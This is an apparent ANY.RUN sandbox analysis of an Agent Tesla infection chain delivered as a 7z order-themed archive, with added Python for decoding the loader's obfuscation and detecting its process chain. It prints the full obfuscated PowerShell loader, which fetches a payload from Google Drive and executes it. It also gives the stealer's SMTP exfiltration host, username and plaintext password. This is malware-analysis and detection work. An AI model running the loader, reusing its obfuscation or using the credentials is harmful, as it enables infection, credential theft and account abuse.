File name: ORDERSTBK05047.7z
Full analysis: https://app.any.run/tasks/3be19a13-c8ba-47c8-b8ab-60d02783be0a
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about its victims' actions by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where the malware is sold.

Analysis date: May 31, 2024, 11:58:10
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
agenttesla
stealer
exfiltration
smtp
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5: 6C73028AC713DEC9C31C3673F92461EF
SHA1: CAC1F7725B737FB44732C719FD2BB32A8F1E3912
SHA256: 4C4A03AEBBBAA3762A8405A1B21E560EB633528C4C1C2E6A8F9AED3E4B1FEB8C
SSDEEP: 96:v5rHMDST0SYuemKQTKUBJ1sIaS+U/Gre8yrtrLOsyXSdL:vJHOgYNYbeXSL/rr1fdL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • AGENTTESLA has been detected (YARA): wab.exe (PID: 5108)
    • Actions looks like stealing of personal data: wab.exe (PID: 5108)
    • Steals credentials from Web Browsers: wab.exe (PID: 5108)
    • Scans artifacts that could help determine the target: wab.exe (PID: 5108)
  • SUSPICIOUS
    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT): wscript.exe (PID: 6812)
    • Uses base64 encoding (POWERSHELL): powershell.exe (PID: 6936), powershell.exe (PID: 7140)
    • Accesses WMI object display name (SCRIPT): wscript.exe (PID: 6812)
    • Starts CMD.EXE for commands execution: powershell.exe (PID: 6936), powershell.exe (PID: 7140)
    • Runs shell command (SCRIPT): wscript.exe (PID: 6812)
    • Starts POWERSHELL.EXE for commands execution: wscript.exe (PID: 6812), powershell.exe (PID: 6936)
    • Accesses system date via WMI (SCRIPT): wscript.exe (PID: 6812)
    • Converts a specified value to a byte (POWERSHELL): powershell.exe (PID: 7140)
    • Reads security settings of Internet Explorer: wab.exe (PID: 5108)
    • Connects to SMTP port: wab.exe (PID: 5108)
    • Checks Windows Trust Settings: wab.exe (PID: 5108)
  • INFO
    • Disables trace logs: powershell.exe (PID: 6936), wab.exe (PID: 5108)
    • Manual execution by a user: wscript.exe (PID: 6812)
    • Uses string split method (POWERSHELL): powershell.exe (PID: 6936), powershell.exe (PID: 7140)
    • Gets data length (POWERSHELL): powershell.exe (PID: 6936), powershell.exe (PID: 7140)
    • Converts byte array into ASCII string (POWERSHELL): powershell.exe (PID: 7140), powershell.exe (PID: 6936)
    • Checks proxy server information: powershell.exe (PID: 6936), wab.exe (PID: 5108)
    • Script raised an exception (POWERSHELL): powershell.exe (PID: 7140)
    • Reads the computer name: wab.exe (PID: 5108)
    • Checks supported languages: wab.exe (PID: 5108)
    • Reads the software policy settings: wab.exe (PID: 5108)
    • Reads Microsoft Office registry keys: wab.exe (PID: 5108)
    • Reads the machine GUID from the registry: wab.exe (PID: 5108)
    • Reads Environment values: wab.exe (PID: 5108)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.

AgentTesla configuration (extracted from PID 5108, wab.exe)
  Protocol: smtp
  Host: smtp.bluegatehomecares.com
  Port: 587
  Username: nicholas.l@bluegatehomecares.com
  Password: GUHTugT7

TRiD
  .7z | 7-Zip compressed archive (v0.4) (57.1)
  .7z | 7-Zip compressed archive (gen) (42.8)

All screenshots are available in the full report
Total processes: 124
Monitored processes: 8
Malicious processes: 4
Suspicious processes: 0

Behavior graph (nodes in the order shown; process details are in the full report)

  • start
  • winrar.exe (no specs)
  • wscript.exe (no specs)
  • powershell.exe
  • conhost.exe (no specs)
  • cmd.exe (no specs)
  • powershell.exe (no specs)
  • cmd.exe (no specs)
  • wab.exe (#AGENTTESLA)

Process information

Columns per record: PID, CMD, Path, Indicators, Parent process

PID: 3728
CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Inkluderingens.Kas && echo t"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 5108
CMD: "C:\Program Files (x86)\windows mail\wab.exe"
Path: C:\Program Files (x86)\Windows Mail\wab.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
PID: 6320
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\ORDERSTBK05047.7z
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 6812
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Desktop\ORDER STBK05047.vbe"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6936
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Gdningsopbevaringerne='S';$Gdningsopbevaringerne+='ubs';$Gdningsopbevaringerne+='tri';$oceanologic = 1;$Gdningsopbevaringerne+='ng';Function Rubidumets($Ujordiskes){$udraab=$Ujordiskes.Length-$oceanologic;For( $Bentlee=1;$Bentlee -lt $udraab;$Bentlee+=2){$enhedstryk+=$Ujordiskes.$Gdningsopbevaringerne.Invoke( $Bentlee, $oceanologic);}$enhedstryk;}function Burgout($Tillgsmandatet){ . ($sigrid) ($Tillgsmandatet);}$Refroze=Rubidumets 'KMKo z i lslFaB/ 5B.N0 A(.WRi,n d oKw sK NATN M1 0O.S0G;L WBi,n 6 4C; xU6a4H;L DrCv,: 1K2 1,.S0B)S G.eLcrkVoD/S2P0P1T0 0,1M0 1M .Fii rFe fNoLx /,1 2S1P.,0 ';$Unseasonably=Rubidumets 'CU s eMrK- A.g eCnUtO ';$skyteren=Rubidumets 'UhUtvtSpUsT:,/ /BdPr i vOeI.CgHo,oFg.l eD.McgoAm,/ u.cK?We.xGpro rOtG=Dd,o w nLlPoGaBdW&Ai,d,=,1 UPJ,8 pWLHzCXSw.oSk aUr.wFsR8 _ Y r 5,kCJBTSI k l C,vtrCdPV - I ';$Smeltman=Rubidumets ',>U ';$sigrid=Rubidumets 'Pi.eKx ';$undominative='Blueweeds';$Kaes = Rubidumets ',eAc h o O% aupSpTdfaAtSaN%H\VI n k,lPuMddeFrKi,nRgfe nTs . KAa s, ,&K&d emc.hFo Dt ';Burgout (Rubidumets ' $tg l o bNaCl :.H eusBt e.vRdwd.e l.b.=T(Vc mTdt s/AcP $ K aIe s.), ');Burgout (Rubidumets ' $Sgrl oCbsaKlU:AI n,k.a,s.sCo.sRa.lrr.sr1M0A9.=S$Us kZy t e rRe n ..s p.l.ist (T$FS mCe l t mSa n ) ');$skyteren=$Inkassosalrs109[0];$Illusionslse= (Rubidumets ' $IgMl oFb,aGlN: H a.a.n dMvCrCkSs,b a g e,rkeKn =UN eBwF-FO bUjteSc,t, BS,yPs,t e m..,NBe t,. WVeHbLCZlMiNeDnTt');$Illusionslse+=$Hestevddelb[1];Burgout ($Illusionslse);Burgout (Rubidumets ',$DH aJaMnRdCvPr k,sEb,a gRe rSeFn . 
HWe,a.dGe,rSsF[A$,USn s eQaFs,oKnSaDbDl.ys]B= $.R,eTf rOoVz eT ');$Tivolierne=Rubidumets 'W$,H.a.a nSdTvRrAk sHbPa gTeTrbe n .bD oCwEn,lSo audSFIi l.eO(U$Ps.k y t,eTr ePn ,L$ r kGe,hFeEr tCu g e r s )s ';$rkehertugers=$Hestevddelb[0];Burgout (Rubidumets 'D$Sg laoNb,aGl :IKSl o sS= (.T eLsBtR- PTa,tghF l$Ur.kFe h e r,t.u g e rPsC)S ');while (!$Klos) {Burgout (Rubidumets '.$ g l.oSbIaGl,:UAFl tAs t e,mMm emr nGeCsF=S$Lt r,uPeW ') ;Burgout $Tivolierne;Burgout (Rubidumets 'DS tRaFr.tG-.SRl eAe p, T4 ');Burgout (Rubidumets '.$,gGl o b.a,l.:KK lDo ss=.( T eas,tG-.PSaStBhH $sr.kae,hUe.rDt u gKe r sD) ') ;Burgout (Rubidumets 'T$,g.lVo.b,aAlA:EKHa d.m iCuKm e.tTs = $ gSlGo bVa lS:PBDr u s,k + +G%,$.I nCk.a sgs oDsUa,l rAsN1 0S9..Mc o usnStS ') ;$skyteren=$Inkassosalrs109[$Kadmiumets];}$Intersected=357313;$pipy=26939;Burgout (Rubidumets 'C$.gVl o b a lP: CMa t gluBtBtBeSn. R=, UG e tE-.C oFnAt.e.n t, $Ar k e h eEr.tSu.g e rSs ');Burgout (Rubidumets 'C$ g lCoDb aRl,: R,h e aFd,i,nNeB S= ,[SS,y.sKt,eNm.. C o n v ePr t ]H:.: FUr oGm.BUa s eS6 4HSPtGr i nNg,( $AC aEtAg uSt t e nS)a ');Burgout (Rubidumets 'B$DgTl.oLb atl :,TMo tIa l fGoDrUsUiSk r i n.g.eMrIn e, ,= .[,SUy sBt eAmE. T ehxKtW..E,nBc oCd iKn gF]T:,:SAMS.CMIFIK.BG.e tRSUtOrAiHnGg (F$HR,hVeHa dAiSn,eR)i ');Burgout (Rubidumets ' $Mgsl osbEaTl : FTlraPvUo b.aSc.t e.rUi u mG=E$,TDo t.aElAfKo r sSi kNrIiLn gDe.rPnFe,.EsPu bDs.t.r iSnKg,(R$.I.nPtSeSr sMeTcUtSeCd ,L$Up i.pRyP). ');Burgout $Flavobacterium;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
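The PID 6936 command line above is the stage-1 loader, and its string obfuscation is the one thing on this page worth automating. Every literal handed to Rubidumets is the real text interleaved with junk: the function walks the string from index 1 in steps of 2 and keeps only the odd-index characters, so the even positions and the final character are never read. Burgout then feeds the decoded text to $sigrid, which itself decodes to iex. The Python below is an added example, not part of the ANY.RUN report: it ports the decoder, adds the inverse encoder, and runs a regex pass that decodes every Rubidumets literal in a script. Four literals are copied verbatim from the command line (iex, User-Agent, Start-Sleep 4 and the drive.google.com URL that also appears in the HTTP requests below). Most other literals on this page cannot be decoded from the rendered text because the report viewer collapsed runs of spaces, which shifts the odd/even alignment the scheme depends on; decode those from the raw command line in the full report. The junk alphabet in obfuscate() is an arbitrary choice.

```python
import re

# Literals copied verbatim from the PID 6936 command line in this report. Only
# these four decode cleanly from the rendered page: the viewer collapsed runs
# of spaces elsewhere, which breaks the odd/even alignment the scheme relies on.
SAMPLE_IEX = "Pi.eKx "
SAMPLE_USER_AGENT = "CU s eMrK- A.g eCnUtO "
SAMPLE_SLEEP = "DS tRaFr.tG-.SRl eAe p, T4 "
SAMPLE_DRIVE_URL = (
    "UhUtvtSpUsT:,/ /BdPr i vOeI.CgHo,oFg.l eD.McgoAm,/ u.cK?We.xGpro rOtG=Dd,o w "
    "nLlPoGaBdW&Ai,d,=,1 UPJ,8 pWLHzCXSw.oSk aUr.wFsR8 _ Y r 5,kCJBTSI k l C,vtrCdPV - I "
)


def decode_odd_chars(blob: str) -> str:
    """Python port of the loader's Rubidumets() helper.

    PowerShell original (variable names shortened):
        $n = $s.Length - 1
        for ($i = 1; $i -lt $n; $i += 2) { $out += $s.Substring($i, 1) }
    Characters at odd indexes are the payload; even indexes hold junk and the
    final character is a terminator the loop never reaches.
    """
    return "".join(blob[i] for i in range(1, len(blob) - 1, 2))


JUNK = "qZ3,. xW"  # arbitrary filler alphabet for obfuscate(); any non-quote chars work


def obfuscate(plain: str) -> str:
    """Inverse of decode_odd_chars(): a junk character before every payload
    character, then a terminator. Handy for test vectors and for recognising
    the layout in other samples."""
    return "".join(JUNK[i % len(JUNK)] + ch for i, ch in enumerate(plain)) + " "


# Call form used throughout the loader: Rubidumets '<literal>'. PowerShell
# single-quoted strings have no escapes other than '', which the loader never uses.
CALL_RE = re.compile(r"Rubidumets\s*'([^']*)'")


def decode_script(script: str) -> list[str]:
    """Decode every Rubidumets literal in a script, in order of appearance."""
    return [decode_odd_chars(m.group(1)) for m in CALL_RE.finditer(script)]


# A constructed stage-1 fragment assembled from the verbatim literals above;
# the variable names are the loader's own.
CONSTRUCTED_SNIPPET = (
    "$sigrid=Rubidumets '" + SAMPLE_IEX + "';"
    "$Unseasonably=Rubidumets '" + SAMPLE_USER_AGENT + "';"
    "$skyteren=Rubidumets '" + SAMPLE_DRIVE_URL + "';"
    "Burgout (Rubidumets '" + SAMPLE_SLEEP + "');"
)


if __name__ == "__main__":
    for decoded in decode_script(CONSTRUCTED_SNIPPET):
        print(decoded)
    # Round trip on the command line the report shows cmd.exe (PID 7068) receiving.
    cmd = r"echo %appdata%\Inkluderingens.Kas && echo t"
    assert decode_odd_chars(obfuscate(cmd)) == cmd
```

Run against the full, uncollapsed command line, decode_script() yields the whole stage-1 logic in one pass: the User-Agent header, the Google Drive URL list split on ">", the download loop that retries every four seconds until %appdata%\Inkluderingens.Kas exists, and the Base64 decode followed by Substring(357313, 26939) that selects the next stage for iex.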
PID: 6944
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7068
CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Inkluderingens.Kas && echo t"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID: 7140
CMD: "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated script as the PID 6936 command line above, verbatim (the loader is run a second time under the 32-bit host)
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
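The process records above describe a chain that transfers directly into a detection: explorer.exe starts WinRAR.exe and wscript.exe, wscript.exe starts a 64-bit powershell.exe, that PowerShell starts cmd.exe and a second, SysWOW64 powershell.exe, and a powershell.exe finally starts wab.exe (Windows Contacts), which is the process the YARA, credential-theft and SMTP signatures fire on. The Python below is an added example, not part of the report: it encodes that ancestry as ordered chain rules over process-creation events and runs them on events constructed from the records above. PIDs, image paths and command lines are the report's; the explorer.exe PID (4000) and the parent PIDs are assumptions, because the report names parents by image only, and wab.exe is attached to the SysWOW64 PowerShell (7140) on the grounds that both are the 32-bit processes in the tree.

```python
import fnmatch
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields a Sysmon event ID 1 row carries)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events: list[ProcEvent], pid: int) -> list[str]:
    """Image basenames from the root ancestor down to `pid` (root first).
    The `seen` set guards against PID reuse producing a cycle."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def is_subsequence(pattern, seq) -> bool:
    """True if every glob in `pattern` matches some element of `seq`, in order,
    with other processes allowed in between (an extra cmd.exe or conhost.exe
    hop must not break the match)."""
    it = iter(seq)
    return all(any(fnmatch.fnmatch(s, p) for s in it) for p in pattern)


# Ordered ancestry patterns; a rule fires on the process that completes it.
CHAIN_RULES = {
    "script_host_to_powershell": ("wscript.exe", "powershell.exe"),
    "powershell_to_wab": ("powershell.exe", "wab.exe"),
    "full_observed_chain": ("explorer.exe", "wscript.exe", "powershell.exe", "powershell.exe", "wab.exe"),
}


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        chain = ancestry(events, e.pid)
        for name, pattern in CHAIN_RULES.items():
            if fnmatch.fnmatch(basename(e.image), pattern[-1]) and is_subsequence(pattern, chain):
                hits.append((e.pid, name))
        # 64-bit PowerShell spawning a SysWOW64 PowerShell, as PID 6936 -> 7140 above.
        parent = by_pid.get(e.ppid)
        if (parent is not None
                and basename(parent.image) == "powershell.exe"
                and basename(e.image) == "powershell.exe"
                and "\\syswow64\\" in e.image.lower()):
            hits.append((e.pid, "powershell_x86_relaunch"))
    return hits


# Constructed from the process information in this report. Assumed values:
# explorer.exe's PID (4000) and every ppid (the report names parents by image only).
EVENTS = [
    ProcEvent(4000, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6320, 4000, r"C:\Program Files\WinRAR\WinRAR.exe",
              r'"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\ORDERSTBK05047.7z'),
    ProcEvent(6812, 4000, r"C:\Windows\System32\wscript.exe",
              r'"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Desktop\ORDER STBK05047.vbe"'),
    ProcEvent(6936, 6812, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe <obfuscated stage-1 loader, PID 6936 above>"),
    ProcEvent(6944, 6936, r"C:\Windows\System32\conhost.exe",
              r"\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(7068, 6936, r"C:\Windows\System32\cmd.exe",
              r'"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Inkluderingens.Kas && echo t"'),
    ProcEvent(7140, 6936, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe <same loader, 32-bit host>"),
    ProcEvent(3728, 7140, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Inkluderingens.Kas && echo t"'),
    ProcEvent(5108, 7140, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule, " -> ".join(ancestry(EVENTS, pid)))
```

The rules fire only on the process that completes a chain, so the benign-looking WinRAR.exe and the two cmd.exe helpers produce no hits while wab.exe matches twice and the SysWOW64 PowerShell is flagged for the 32-bit relaunch; "powershell_to_wab" is the rule worth deploying on its own, since Windows Contacts has no reason to be a child of PowerShell.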
Total events: 20 035
Read events: 19 970
Write events: 65
Delete events: 0

Modification events (all by PID 6320, WinRAR.exe; all operations are writes)

  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes: ShellExtBMP = (empty)
  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes: ShellExtIcon = (empty)
  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory: 1 = C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory: 0 = C:\Users\admin\Desktop\ORDERSTBK05047.7z
  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths: name = 120
  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths: size = 80
  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths: type = 120
  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths: mtime = 100
  • HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E: @C:\WINDOWS\System32\wshext.dll,-4803 = VBScript Encoded Script File
  • HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin: Placement = 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF41010000370000000105000020020000
Executable files: 0
Suspicious files: 2
Text files: 6
Unknown types: 0

Dropped files (PID, process, filename, type, hashes)

  • 6936 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mkhacmfk.dxw.psm1 (text)
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  • 6936 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yfez4bbv.0ei.ps1 (text)
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  • 6936 powershell.exe: C:\Users\admin\AppData\Roaming\Inkluderingens.Kas (text)
    MD5: 05E4C79B0B2AD035DD119722584D0CEC
    SHA256: 051F53541631903CD249457F9D175809933D0B0CB64A7D8635F692807B2C52E0
  • 6320 WinRAR.exe: C:\Users\admin\AppData\Local\Temp\Rar$DRa6320.1619\ORDER STBK05047.vbe (text)
    MD5: 91900494367AE31225B981F72908861A
    SHA256: C9712BA57F4A28529F198F85185717F9607E1301C69CB565C839B7E9476E52EC
  • 7140 powershell.exe: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache (binary)
    MD5: 8E7D26D71A1CAF822C338431F0651251
    SHA256: 495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
  • 7140 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_izodhed1.b3p.ps1 (text)
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  • 7140 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wdb5rqcz.tlj.psm1 (text)
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  • 6936 powershell.exe: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (binary)
    MD5: 609B1ADBE874C55FF6B5E44BED42B842
    SHA256: 6AD0114DAEFE2E3F21158CF0358DAE69D6F77665998B439E4D95637CDCB1767C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 12
TCP/UDP connections: 28
DNS requests: 8
Threats: 9

HTTP requests (PID | Process | Method | HTTP code | IP | URL | Country | Type | Size | Reputation)

5612 | RUXIMICS.exe | GET | 200 | 62.115.252.171:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | ES | binary | 1.01 Kb | unknown
5952 | svchost.exe | GET | 200 | 2.21.189.233:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | GB | binary | 973 b | unknown
5140 | MoUsoCoreWorker.exe | GET | 200 | 62.115.252.171:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | ES | binary | 1.01 Kb | unknown
5952 | svchost.exe | GET | 200 | 62.115.252.171:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | ES | binary | 1.01 Kb | unknown
- | - | GET | 303 | 172.217.18.4:443 | https://drive.google.com/uc?export=download&id=1AMlHX4HR0UUC-ocvsIO4liygCQUyuGgC | US | - | - | unknown
5612 | RUXIMICS.exe | GET | 200 | 2.21.189.233:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | GB | binary | 973 b | unknown
- | - | GET | 303 | 172.217.18.4:443 | https://drive.google.com/uc?export=download&id=1UJ8pLzXwokarws8_Yr5kJTIklCvrdV-I | US | - | - | unknown
5140 | MoUsoCoreWorker.exe | GET | 200 | 2.21.189.233:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | GB | binary | 973 b | unknown
- | - | GET | 200 | 142.250.185.193:443 | https://drive.usercontent.google.com/download?id=1UJ8pLzXwokarws8_Yr5kJTIklCvrdV-I&export=download | US | text | 500 Kb | unknown
- | - | GET | 200 | 142.250.185.193:443 | https://drive.usercontent.google.com/download?id=1AMlHX4HR0UUC-ocvsIO4liygCQUyuGgC&export=download | US | binary | 234 Kb | unknown

The rows with a PID are CRL fetches by Windows system processes. The four Google Drive rows (two 303 redirects from drive.google.com and the two drive.usercontent.google.com downloads they lead to) carry no PID in the report; the id=1UJ8pLzXwokarws8_Yr5kJTIklCvrdV-I link is the one encoded in the stage-1 PowerShell command line above, and its 500 Kb text response matches the Base64 file that script reads back from %appdata%\Inkluderingens.Kas.

Connections (PID | Process | IP:port | Domain | ASN | Country | Reputation)

4 | System | 192.168.100.255:138 | - | - | - | unknown
5952 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5612 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5140 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 239.255.255.250:1900 | - | - | - | unknown
5612 | RUXIMICS.exe | 62.115.252.171:80 | crl.microsoft.com | Telia Company AB | ES | unknown
5140 | MoUsoCoreWorker.exe | 62.115.252.171:80 | crl.microsoft.com | Telia Company AB | ES | unknown
5952 | svchost.exe | 62.115.252.171:80 | crl.microsoft.com | Telia Company AB | ES | unknown
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
5612 | RUXIMICS.exe | 2.21.189.233:80 | www.microsoft.com | Akamai International B.V. | GB | unknown

This excerpt lists 10 of the 28 connections. The wab.exe (PID 5108) SMTP session to smtp.bluegatehomecares.com on port 587, recorded in the AgentTesla configuration and in the Threats section, and the api.ipify.org lookup seen in the DNS requests are among the connections not reproduced here.

DNS requests (domain → resolved IPs, reputation)

  • crl.microsoft.com → 62.115.252.171, 62.115.252.162 (whitelisted)
  • www.microsoft.com → 2.21.189.233 (whitelisted)
  • settings-win.data.microsoft.com → 4.231.128.59 (whitelisted)
  • drive.google.com → 142.250.181.238 (shared)
  • drive.usercontent.google.com → 216.58.212.129 (unknown)
  • api.ipify.org → 104.26.13.205, 172.67.74.152, 104.26.12.205 (shared)
